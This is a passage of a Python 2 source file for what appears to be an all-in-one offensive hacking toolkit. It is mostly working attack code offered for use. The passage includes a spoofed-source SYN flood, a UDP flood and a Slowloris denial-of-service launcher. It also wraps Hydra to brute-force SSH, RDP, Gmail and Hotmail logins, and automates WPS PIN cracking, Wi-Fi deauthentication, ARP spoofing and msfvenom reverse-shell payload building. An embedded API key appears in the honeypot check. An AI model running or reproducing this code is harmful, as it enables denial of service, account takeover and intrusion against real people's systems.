Fedora/3.0.1-1.fc9 Firefox/3.0.1')] + + + print '''\033[1;31m + _________ __ __ __ + / _____// |________|__| | __ ___________ + \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ + / \| | | | \/ | <\ ___/| | \/ + /_______ /|__| |__| |__|__|_ \\\\___ >__| + \/ \/ \/\033[1;m''' + target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') + if 'http' in target: + parsed_uri = urlparse(target) + domain = '{uri.netloc}'.format(uri=parsed_uri) + else: + domain = target + try: + br.open('http://' + target) + target = 'http://' + target + except: + target = 'https://' + target + + def sqli(url): + print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run + br.open('https://suip.biz/?act=sqlmap') + br.select_form(nr=0) + br.form['url'] = url + req = br.submit() + result = req.read() + match = search(r"---(?s).*---", result) + if match: + print '%s One or more parameters are vulnerable to SQL injection' % good + option = raw_input( + '%s Would you like to see the whole report? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + print '\033[1;31m-\033[1;m' * 40 + print match.group().split('---')[1][:-3] + print '\033[1;31m-\033[1;m' * 40 + else: + print '%s None of parameters is vulnerable to SQL injection' % bad + + + def cms(domain): + try: + result = br.open('https://whatcms.org/?s=' + domain).read() + detect = search(r'class="nowrap" title="[^<]*">', result) + WordPress = False + try: + r = br.open(target + '/robots.txt').read() + if "wp-admin" in str(r): + WordPress = True + except: + pass + if detect: + print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) + detect = detect.group().split('">')[1][:-27] + if 'WordPress' in detect: + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + elif WordPress: + print '%s CMS Detected : WordPress' % info + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + else: + print '%s %s doesn\'t seem to use a CMS' % (info, domain) + except: + pass + + def honeypot(ip_addr): + result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} + honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr + try: + phoney = br.open(honey).read() + if float(phoney) >= 0.0 and float(phoney) <= 0.4: + what = good + else: + what = bad + print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) + except KeyError: + print '\033[1;31m[-]\033[1;m Honeypot prediction failed' + + def whoisIt(url): + who = "" + print '{} Trying to gather whois information for {}'.format(run,url) + try: + who = str(whois.whois(url)).decode() + except Exception: + pass + test = who.lower() + if "whoisguard" in test or "protection" in test or "protected" in test: + print '{} Whois Protection Enabled{}'.format(bad, end) + else: + print '{} Whois information found{}'.format(good, end) + try: + data = json.loads(who) + for key in data.keys(): + print "{} :".format(key.replace("_", " ").title()), + if type(data[key]) == list: + print ", ".join(data[key]) + else: + print "{}".format(data[key]) + except ValueError: + print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) + pass + + def nmap(ip_addr): + port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr + result = br.open(port).read() + result = sub(r'Starting[^<]*\)\.', '', result) + result = sub(r'Service[^<]*seconds', '', result) + result = os.linesep.join([s for s in result.splitlines() if s]) + print result + + def bypass(domain): + post = urlencode({'cfS': domain}) + result = br.open( + 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() + + match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) + if match: + bypass.ip_addr = match.group().split(' ')[1][:-1] + print '%s Real IP Address : %s' % (good, bypass.ip_addr) + + def dnsdump(domain): + res = DNSDumpsterAPI(False).search(domain) + print '\n%s DNS Records' % good + for entry in res['dns_records']['dns']: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + for entry in res['dns_records']['mx']: + print '\n%s MX Records' % good + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n\033[1;32m[+]\033[1;m Host Records (A)' + for entry in res['dns_records']['host']: + if entry['reverse_dns']: + print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) + else: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n%s TXT Records' % good + for entry in res['dns_records']['txt']: + print entry + print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) + + + def fingerprint(ip_addr): + try: + result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() + match = search(r'"os_description": "[^<]*"', result) + if match: + print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) + except: + pass + + + ip_addr = socket.gethostbyname(domain) + print '%s IP Address : %s' % (info, ip_addr) + try: + r = requests.get(target) + header = r.headers['Server'] + if 'cloudflare' in header: + print '%s Cloudflare detected' % bad + bypass(domain) + try: + ip_addr = bypass.ip_addr + except: + pass + else: + print '%s Server: %s' % (info, header) + try: + print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) + except: + pass + try: + r.headers['X-Frame-Options'] + except: + print '%s Clickjacking protection is not in place.' % good + except: + pass + fingerprint(ip_addr) + cms(domain) + try: + honeypot(ip_addr) + except: + pass + print "{}----------------------------------------{}".format(red, end) + whoisIt(domain) + try: + r = br.open(target + '/robots.txt').read() + print '\033[1;31m-\033[1;m' * 40 + print '%s Robots.txt retrieved\n' % good, r + except: + pass + print '\033[1;31m-\033[1;m' * 40 + nmap(ip_addr) + print '\033[1;31m-\033[1;m' * 40 + dnsdump(domain) + os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) + try: + br.open(target) + print '%s Crawling the target for fuzzable URLs' % run + for link in br.links(): + if 'http' in link.url or '=' not in link.url: + pass + else: + url = target + '/' + link.url + params.append(url) + if len(params) == 0: + print '%s No fuzzable URLs found' % bad + quit() + print '%s Found %i fuzzable URLs' % (good, len(params)) + for url in params: + print url + sqli(url) + url = url.replace('=', '') + r = br.open(url).read() + if '' in r: + print '%s One or more parameters are vulnerable to XSS' % good + break + print '%s These are the URLs having parameters:' % good + for url in params: + print url + except: + pass +#------------------# +#INFO SCAN HOST END# + + +#INFO ON YOUR SYSTEM START# +#-------------------------# +def sysinfo(): + os.system("iwconfig") + k = raw_input("Interface: ") + os.system("clear") + os.system("ifconfig") + print "\n" + os.system("iwconfig") + print "\n" + os.system("neofetch") + print "\n" + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) + print "\n Router IP" + print "----------------------------\033[92m" + os.system('curl "http://myexternalip.com/raw"') + print "\n\033[0m----------------------------" + print "\n" + show = 'macchanger -s {0}'.format(k) + os.system(show) +#-----------------------# +#INFO ON YOUR SYSTEM END# + + +#ALL METASPLOIT EXPLOITS START# +#-----------------------------# +def msfex(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show exploits'""") +#---------------------------# +#ALL METASPLOIT EXPLOITS END# + + +#UDP DOS START# +#-------------# +def udp(): + target = raw_input(N+"Target:\033[91m ") + ip = socket.gethostbyname(target) + port = input(N+"Port:\033[91m ") + os.system("service tor restart") + print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) + os.system("sleep 2s") + sent = 0 + print "KILLING %s CONNECTIONS"%(ip) + while True: + sock.sendto(Gb, (ip,port)) + sock.sendto(bytes, (ip,port)) + sock.sendto(Kb, (ip,port)) + sent = sent + 1 + port = port + 1 + print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) + if port == 65534: + port = 1 +#-----------# +#UDP DOS END# + +#TCP FLOOD START# +#---------------# +def tcp(): + print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" + print "\n" + tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") + print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" + os.system("sleep 5") + os.system("python /root/hackers-tool-kit/tools/" + tcp) +#-------------# +#TCP FLOOD END# + + +#SYN FLOOD START# +#---------------# +def syn(): + def randomIP(): + ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) + return ip + + def randInt(): + x = random.randint(1000,9000) + return x + + def SYN_Flood(dstIP,dstPort,counter): + total = 0 + print "Packets are sending ..." + for x in range (0,counter): + s_port = randInt() + s_eq = randInt() + w_indow = randInt() + + IP_Packet = IP () + IP_Packet.src = randomIP() + IP_Packet.dst = dstIP + + TCP_Packet = TCP () + TCP_Packet.sport = s_port + TCP_Packet.dport = dstPort + TCP_Packet.flags = "S" + TCP_Packet.seq = s_eq + TCP_Packet.window = w_indow + + send(IP_Packet/TCP_Packet, verbose=0) + total+=1 + sys.stdout.write("\nTotal packets sent: %i\n" % total) + + + def info(): + + dstIP = raw_input ("\nTarget IP : ") + dstPort = input ("Target Port : ") + + return dstIP,int(dstPort) + + + def main(): + dstIP,dstPort = info() + counter = input ("Packets : ") + SYN_Flood(dstIP,dstPort,int(counter)) + + main() +#-------------# +#SYN FLOOD END# + + +#PING A HOST START# +#-----------------# +def ping(): + p = raw_input("Enter Host: ") + os.system("ping " + p) +#---------------# +#PING A HOST END# + + +#ALL METASPLOIT PAYLOADS START# +#-----------------------------# +def msfpa(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show payloads'""") +#---------------------------# +#ALL METASPLOIT PAYLOADS END# + + +#ALL METASPLOIT AUX START# +#------------------------# +def msfau(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show auxiliary'""") +#----------------------# +#ALL METASPLOIT AUX END# + + +#START METASPLOIT HANDLER START# +#------------------------------# +def multih(): + os.system("service postgresql start") + os.system("""msfconsole -x 'use multi/handler'""") +#----------------------------# +#START METASPLOIT HANDLER END# + + +#ALL METASPLOIT MODS START# +#-------------------------# +def msfall(): + os.system("service postgresql start") + os.sytem("""msfconsole -x 'show all'""") +#-----------------------# +#ALL METASPLOIT MODS END# + + +#HYDRA AUTOMATED START# +#---------------------# +def hydra(): + """ + This program is just a small program to shorten brute force sessions on hydra :) + But to be more satisfying results of the brute force. You better interact directly with hydra, + without having to use this black hydra console first: '). + If you find any errors in running our program. Can chat via facebook :). + Hydra is needed for the process of this program :). + """ + import sys, os, time + + # Restart #################### + def restart_program(): + python = sys.executable + os.execl(python, python, * sys.argv) + curdir = os.getcwd() + ############################## + + os.system("clear") + print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" + print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" + print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" + print G+"-----------------------------------------------------" + print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" + print R+" [*] Author: DedSecTL --- [*] Version 1.0" + print N+"c=={:::::::::::::::> Black Hydra Console" + print R+" [*] My FB : https://m.facebook.com/100004136748473" + print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" + print + print " ===|[ Brute Force ]|===" + print + print " [01] Cisco Brute Force " + print " [02] VNC Brute Force " + print " [03] FTP Brute Force " + print " [04] Gmail Brute Force " + print " [05] SSH Brute Force " + print " [06] TeamSpeak Brute Force " + print " [07] Telnet Brute Force " + print " [08] Yahoo Mail Brute Force " + print " [09] Hotmail Brute Force " + print " [10] Router Speedy Brute Force " + print " [11] RDP Brute Force " + print " [12] MySQL Brute Force " + print + print " [00] Exit" + print + bhydra = raw_input("[*] B-Hydra > ") + + if bhydra == '01' or bhydra == '1': + print + print " +---------------------------+" + print " | Cisco Brute Force |" + print " +---------------------------+" + print + print + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -P %s %s cisco" % (word, iphost)) + sys.exit() + + elif bhydra == '02' or bhydra == '2': + print + print " +---------------------------+" + print " | VNC Brute Force |" + print " +---------------------------+" + print + print + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) + iphost = raw_input("[*] IP/Hostname : ") + + elif bhydra == '03' or bhydra == '3': + print + print " +------------------------------+" + print " | FTP Brute Force |" + print " +------------------------------+" + print + print + user = raw_input("[*] User : ") + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '04' or bhydra == '4': + print + print " +------------------------------+" + print " | Gmail Brute Force |" + print " +------------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '05' or bhydra == '5': + print + print " +--------------------------------+" + print " | SSH Brute Force |" + print " +--------------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) + sys.exit() + + elif bhydra == '06' or bhydra == '6': + print + print " +-------------------------+" + print " | TeamSpeak Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) + sys.exit() + + elif bhydra == '07' or bhydra == '7': + print + print " +-------------------------+" + print " | Telnet Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) + sys.exit() + + elif bhydra == '08' or bhydra == '8': + print + print " +---------------------------+" + print " | Yahoo Brute Force |" + print " +---------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '09' or bhydra == '9': + print + print " +----------------------------+" + print " | Hotmail Brute Force |" + print " +----------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '10': + print + print " +-----------------------------+" + print " | Router Speedy Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) + sys.exit() + + elif bhydra == '11': + print + print " +----------------------------+" + print " | RDP Brute Force |" + print " +----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '12': + print + print " +-----------------------------+" + print " | MySQL Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) + + elif bhydra == '00' or bhydra == '0': + print "\n[!] Exit the Program..." + sys.exit() + + else: + print "\n[!] ERROR : Wrong Input" + time.sleep(1) + restart_program() +#-------------------# +#HYDRA AUTOMATED END# + + +#WORDLIST MAKER START# +#--------------------# +def cupp(): + os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") + print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" +#------------------# +#WORDLIST MAKER END# + + +#LIST FILES START# +#----------------# +def vdir(): + print "\n" + os.system("ls") + print Y+"! doesnt have to be these can be any directory !\033[0m" + print "\n" + h = raw_input("Directory Path: ") + print "\n" + print "--------------------------------------------------------------------------------------------------------------------------------------------" + os.system("ls " + h) + print "--------------------------------------------------------------------------------------------------------------------------------------------" +#--------------# +#LIST FILES END# + + +#MONITOR MODE OFF START# +#----------------------# +def monoff(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng stop " + i) +#--------------------# +#MONITOR MODE OFF END# + + +#TURN ON VPN START# +#-----------------# +def vpn(): + os.system("anonsurf start") + os.system("anonsurf myip") +#---------------# +#TURN ON VPN END# + + +#TURN OFF VPN START# +#------------------# +def vpnoff(): + os.system("anonsurf stop") + os.system("anonsurf myip") +#----------------# +#TURN OFF VPN END# + + +#SLOW LORIS DOS START# +#--------------------# +def slowl(): + de = raw_input("Delay: ") + tar = raw_input("RHOST: ") + port = raw_input("RPORT: ") + soc = raw_input("Sockets: ") + os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') + os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) + os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) + os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) + os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) + os.system('echo "run\n" >> slowl.rc') + os.system('msfconsole -r slowl.rc') + os.system('rm -rf slowl.rc') +#------------------# +#SLOW LORIS DOS END# + + +#OPEN DOX WEBSITE START# +#----------------------# +def pidox(): + print Y+"! USING FIREFOX !\033[0m" + os.system("sleep 2") + os.system("firefox https://pipl.com/") +#--------------------# +#OPEN DOX WEBSITE END# + + +#SCAN SPECIFIC NET START# +#-----------------------# +def specnet(): + jk = raw_input("BSSID: ") + kj = raw_input("ESSID: ") + os.system("iwconfig") + k = raw_input("INTERFACE: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) + if j == "n": + a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) +#---------------------# +#SCAN SPECIFIC NET END# + + +#DEFAULT WIFI PIN START# +#----------------------# +def pingen(): + j = raw_input("Enter BSSID: ") + a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) + os.system(a) +#--------------------# +#DEFAULT WIFI PIN END# + + +#WIFI PIN BRUTEFORCE START# +#-------------------------# +def reaver(): + os.system("iwconfig") + j = raw_input("Select Interface: ") + k = raw_input("Enter BSSID: ") + a = 'reaver -i {0} -b {1} -vv'.format(j,k) + os.system(a) +#-----------------------# +#WIFI PIN BRUTEFORCE END# + + +#DEAUTH ATTACK START# +#-------------------# +def deauth(): + print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" + j = raw_input("Enter BSSID> ") + os.system("iwconfig") + k = raw_input("Enter Interface> ") + a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) + os.system(a) +#-----------------# +#DEAUTH ATTACK END# + + +#MAC CHANGER START# +#-----------------# +def macc(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -r " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +#-----------------# +#MAC CHANGER START# + + +#MAC CHANGER OFF START# +#---------------------# +def macoff(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -p " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +#-------------------# +#MAC CHANGER OFF END# + + +#ARP SPOOF START# +#---------------# +def arpspoof(): + print "\033[93mif using multiple targets heres an example: 134.143.1.3, 134.143.1.6\033[0m\n" + h = raw_input("Targets: ") + os.system('echo "net.sniff on\n" >> arp.cap') + os.system('echo "set arp.spoof.targets {0}\n" >> arp.cap'.format(h)) + os.system('echo "arp.spoof on\n" >> arp.cap') + print '\n\033[93mto stop type "exit"\033[0m' + os.system("sleep 2") + os.system("bettercap -no-history -caplet arp.cap") + os.system("rm arp.cap") +#-------------# +#ARP SPOOF END# + + +#SSL SCAN START# +#--------------# +def sslscan(): + j = raw_input('Enter Target: ') + a = 'sslscan {0}'.format(j) + os.system(a) +#------------# +#SSL SCAN END# + + +#MAKE A PAYLOAD START# +#--------------------# +def payload(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + print "\n" + f = raw_input("Select Payload: ") + l = raw_input("LHOST: ") + c = raw_input("LPORT: ") + s = raw_input("File Format: ") + h = raw_input("File Name: ") + a = 'msfvenom -p {0} LHOST={1} LPORT={2} -o /root/{3}.{4}'.format(f,l,c,h,s) + os.system(a) +#------------------# +#MAKE A PAYLOAD END# + + +#WORDLIST MAKER START# +#--------------------# +def crunch(): + print "minimal number of characters" + j = raw_input("[CRUNCH]: ") + print "maximum number of characters" + k = raw_input("[CRUNCH]: ") + print "what characters should be in it" + b = raw_input("[CRUNCH]: ") + print "name of file" + s = raw_input("[CRUNCH]: ") + a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) + os.system(a) + print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s +#------------------# +#WORDLIST MAKER END# + + +#INTERNET TRAFFIC START# +#----------------------# +def traff(): + os.system("iwconfig") + s = raw_input("Select Interface: ") + os.system("tcpdump -i " + s) +#--------------------# +#INTERNET TRAFFIC END# + + +#RESET ACCOUNT PASSWORD START# +#----------------------------# +def resa(): + j = raw_input("USERNAME: ") + k = raw_input("NEW PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'echo "{0}:{1}" | chpasswd'.format(j,k) + print "password for {0} has been reset".format(j) +#--------------------------# +#RESET ACCOUNT PASSWORD END# + + +#RESET UNIX PASSWORD START# +#-------------------------# +def resu(): + j = raw_input("PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'passwd {0}'.format(j) + print "unix password has been reset".format(j) +#-----------------------# +#RESET UNIX PASSWORD END# + + +#FIND HASH TYPE START# +#--------------------# +def hashid(): + #!/usr/bin/python + # encoding: utf-8 + # Hash Identifier v1.1 + # By Zion3R + # www.Blackploit.com + # Root@Blackploit.com + + logo=''' ######################################################################### + # __ __ __ ______ _____ # + # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # + # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # + # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # + # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # + # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # + # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # + # By Zion3R # + # www.Blackploit.com # + # Root@Blackploit.com # + #########################################################################''' + + algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} + + # hash.islower() minusculas + # hash.isdigit() numerico + # hash.isalpha() letras + # hash.isalnum() alfanumerico + + def CRC16(): + hs='4607' + if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101020") + def CRC16CCITT(): + hs='3d08' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101040") + def FCS16(): + hs='0e5b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101060") + + def CRC32(): + hs='b33fd057' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102040") + def ADLER32(): + hs='0607cb42' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102020") + def CRC32B(): + hs='b764a0d9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102060") + def XOR32(): + hs='0000003f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102080") + + def GHash323(): + hs='80000000' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103040") + def GHash325(): + hs='85318985' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103020") + + def DESUnix(): + hs='ZiY8YtDKXJwYQ' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: + jerar.append("104020") + + def MD5Half(): + hs='ae11fd697ec92c7c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105060") + def MD5Middle(): + hs='7ec92c7c98de3fac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105040") + def MySQL(): + hs='63cea4673fd25f46' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105020") + + def DomainCachedCredentials(): + hs='f42005ec1afe77967cbc83dce1b4d714' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106025") + def 